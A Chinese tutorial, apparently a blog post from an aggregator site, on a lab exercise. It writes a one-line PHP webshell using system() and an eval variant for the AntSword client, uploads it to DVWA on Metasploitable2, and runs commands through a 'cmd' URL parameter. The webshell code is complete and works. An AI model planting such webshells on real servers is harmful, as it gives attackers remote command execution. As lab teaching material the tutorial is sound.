当前位置: 首页 > news >正文

php一句话木马(+蚁剑)

一.php一句话木马

一句话木马是一种极简的WebShell,常用于渗透测试中远程执行代码。它通常通过文件上传、代码注入等方式植入目标服务器。

二.实验环境(在同一局域网中)

靶机为Mstasploitable2-linux的DVWA

攻击方为kali,windows

三.构造shell.php

可以直接在桌面上创建文档

写入代码,新建文件shell.php

<?php system($_REQUEST ['cmd']);?>

四.主机查看IP,nmap

五.文件上传

得到靶机IP后,用火狐浏览器登录DVWA

http://靶机ip/dvwa/login.php

登录账号密码为:admin,password

到文件上传窗口

然后知道shell.php在服务器中的位置

六.远程控制

访问路径

http://靶机ip/dvwa/hackable/uploads/shell.php?cmd=ls

七.蚁剑控制

如果要用蚁剑控制的话,得把一句话木马改掉

改完后重新上传文件

<?php @eval($_REQUEST ['cmd']);?>

测试连接,连接成功后保存,可以进行操作了

http://www.jsqmd.com/news/146539/

相关文章:

  • CTF-NetA:网络流量分析的终极解决方案
  • ImageGlass:重新定义Windows图片浏览体验的开源利器
  • GridPlayer:革新多视频播放体验的跨平台解决方案
  • 百度ERNIE 4.5重磅发布:300B参数大模型来了!
  • 百度ERNIE 4.5-VL重磅发布:280亿参数视觉语言大模型来了!
  • 抖音无水印视频下载终极教程:3种简单方法快速搞定
  • 利用PaddlePaddle镜像快速实现工业级目标检测(PaddleDetection)
  • 虚幻引擎资源逆向工程终极指南:用FModel深度解析游戏资产
  • SpringBoot+Vue 考勤管理系统平台完整项目源码+SQL脚本+接口文档【Java Web毕设】
  • PaddlePaddle异常检测算法实现:AutoEncoder应用场景
  • 2025年12月江苏徐州民族舞舞蹈学校竞争格局深度分析报告 - 2025年品牌推荐榜
  • Switch变身全能娱乐站:wiliwili大屏B站体验全解析
  • Google发布300M EmbeddingGemma:移动端也能跑的AI嵌入模型
  • 【C++】面试官爱的C++多态八股文,这次让你彻底搞懂!
  • 2025年热门的快充家用吸尘器/家用吸尘器厂家推荐与选购指南 - 行业平台推荐
  • 开源工业监控平台:解决传统SCADA系统的成本与技术困局
  • 【C++】你的二叉搜索树为什么慢?因为你还没解锁“平衡”的力量--AVL树核心详解
  • 腾讯混元0.5B轻量模型:边缘AI推理新选择
  • AI绘图新工具:让人物秒变真人的LoRA模型
  • WaveTools鸣潮工具箱终极指南:快速解锁游戏流畅体验
  • NextStep-1震撼发布:140亿参数AI绘图新突破
  • 老旧Mac升级终极配置指南:OpenCore完整解决方案
  • PaddleDetection实战:用PaddlePaddle镜像完成YOLOv3目标检测
  • 鸣潮工具箱WaveTools:从游戏辅助到体验升级的全方位指南
  • PaddleSlim模型剪枝实战:轻量化部署移动端AI应用
  • C++】透视C++多态:从虚函数表到底层内存布局的完全拆解
  • PaddlePaddle镜像更新日志:最新版本新增功能一览
  • GLM-4.5-Air-Base开放!120亿参数AI模型免费商用
  • GoView低代码数据可视化平台实战指南:从零构建企业级数据大屏
  • 实战案例引导:搭建首个USB3.0通信环境(新手适用)